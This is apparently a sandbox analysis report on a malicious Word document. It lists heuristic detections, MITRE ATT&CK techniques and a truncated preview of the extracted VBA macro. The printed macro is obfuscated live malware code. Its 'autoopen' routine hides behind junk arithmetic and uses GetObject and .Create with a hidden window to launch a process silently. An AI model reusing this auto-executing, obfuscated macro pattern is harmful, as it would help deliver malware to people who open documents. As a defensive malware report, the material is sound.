MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The 'autoopen' subroutine and the use of GetObject are strong indicators of malicious intent, commonly used to execute arbitrary code or download additional payloads. The presence of legacy WordBasic markers further supports this. The macro's obfuscated nature and lack of clear URLs prevent a more specific family attribution.
Heuristics 7
-
ClamAV: Doc.Malware.Dslb-6913532-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dslb-6913532-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14912 bytes |
SHA-256: f42c024dfd456b4a02cefab205df09b3d7193f2eb7b18ebcc40abcc01df3b32e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "bQAAZU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "cA1AUc"
Attribute VB_Base = "0{0824E3C0-F167-4ADA-B2E5-3044AAE26B50}{F7EE5D34-6E55-4627-8848-85D30D64B202}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "jokUAGwk"
Attribute VB_Base = "0{17345765-7C45-4F98-98EF-B262DB51AE8B}{E4953264-A526-4F89-9CE9-8C9E7E192E85}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "RGUAA_UB"
Sub autoopen()
On Error Resume Next
Select Case FAcDDA
Case 250526332
uAwAAA = WA1AAACA / 184449737 / _
KA4QBXUA - CInt(wA_A1ZAo + CInt(537607546)) + _
(640026050 * CLng(405819396))
HAUA_A = 35629976 * OADw1U
NkAo_AB = 510223455 - 345027111 + _
843614596 - hAADcAAA / iBXQDABA - Tan(184980377)
End Select
Select Case wAADGUBA
Case 187173822
mUCABB = LcABAD / 960711988 / _
WxAkQA4 - CInt(RAAcXQ + CInt(769201175)) + _
(64686978 * CLng(872861532))
WQBAAAAQ = 691068926 * lAxoABCc
qAZBBAA = 923286993 - 799323542 + _
367749577 - MkGAoXA / mADDxc - Tan(312608719)
End Select
Set ZBAG1AQ = GetObject(cA1AUc.iDAwAAB + jokUAGwk.nA_C1D + cA1AUc.iDAwAAB)
Select Case T_cXDXBA
Case 173379796
KB1UDkCA = T_AcAD_ / 335050708 / _
sAAADQ - CInt(MC1QQA + CInt(618367836)) + _
(211583172 * CLng(304864153))
c1w_1x = 992512770 * RAU_kG
VCAAAAUB = 118120437 - 595493069 + _
960866305 - bAxkQAA / QDw1oA - Tan(581880435)
End Select
Select Case aAUQQUoA
Case 893149038
FwDAUACQ = SUDZAQ / 291043682 / _
rw1AwcCA - CInt(vAAAUQw + CInt(4335779)) + _
(625428921 * CLng(510376421))
GA4AxA = 292411574 * ikAAUA1B
mo1AAAAC = 968994281 - 697120209 + _
776755836 - cUDGAA / GABAAcA - Tan(698389411)
End Select
Select Case D4ADA4AA
Case 123114424
bAADAZA = XU_wBCA / 809327861 / _
vkABXA - CInt(jADGkC + CInt(380083917)) + _
(691765123 * CLng(860630075))
RC4UxAGk = 706746492 * jkBBQ1U
W1wkAUQ1 = 510788149 - 839348828 + _
893397541 - E4DAUAAQ / bwwcAA - Tan(189463134)
End Select
ZBAG1AQ.ShowWindow = 202821 - 202821
Select Case FwwBBcG
Case 921124079
Ocx1AC = PA1AxU / 410061604 / _
MQwQ1c - CInt(hBkAA4B_ + CInt(324812432)) + _
(778098624 * CLng(352444613))
WUcA1CAD = 197549812 * iGADxA
iBZUcZ = 493277691 - 310917716 + _
717929138 - fAAQAAAA / PD_AcA - Tan(110414188)
End Select
Select Case nAkAQA
Case 313276504
SAAAQA = MkUACCDD / 3635544 / _
pAAAADD_ - CInt(C4A1UB + CInt(817039379)) + _
(105211576 * CLng(188494236))
SA_ACQ = 807787936 * rQ_AXA1A
kAUCXZ = 449206340 - 981328580 + _
240631319 - wAD4Ax4 / PAAAXZAA - Tan(92674023)
End Select
Select Case FZGUox
Case 573375672
jD1kcU = jo4AUD / 295944961 / _
CAA_DABQ - CInt(EUG41DC + CInt(820752257)) + _
(796583098 * CLng(643792896))
WAUAAA_U = 409212440 * AcQAA1k
ICcoxA1 = 658925874 - 760623392 + _
281558789 - lD4_Q_ / DAAACAA - Tan(766534534)
End Select
GetObject(cA1AUc.iDAwAAB + jokUAGwk.jwQB_UUD + cA1AUc.iDAwAAB) _
.Create cA1AUc.iDAwAAB + jokUAGwk.H4DDx_ + cA1AUc.iDAwAAB + jokUAGwk.cAZUwAxQ + cA1AUc.iDAwAAB + cA1AUc.iDAwAAB + jokUAGwk.SAGAAAcA + cA1AUc.iDAwAAB + cA1AUc.iDAwAAB + jokUAGwk.H1AAxC + cA1AUc.iDAwAAB + jokUAGwk.scA_AAA_ + cA1AUc.iDAwAAB, jQADXAc, ZBAG1AQ, cA1AUc.iDAwAAB
Select Case O_AccAA
Case 65323087
rUGwQkA = fDADw4 / 228721386 / _
oAcAkk - CInt(OXU4cBD + CInt(94164079)) + _
(795705252 * CLng(221281201))
oUADABUB = 99451
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.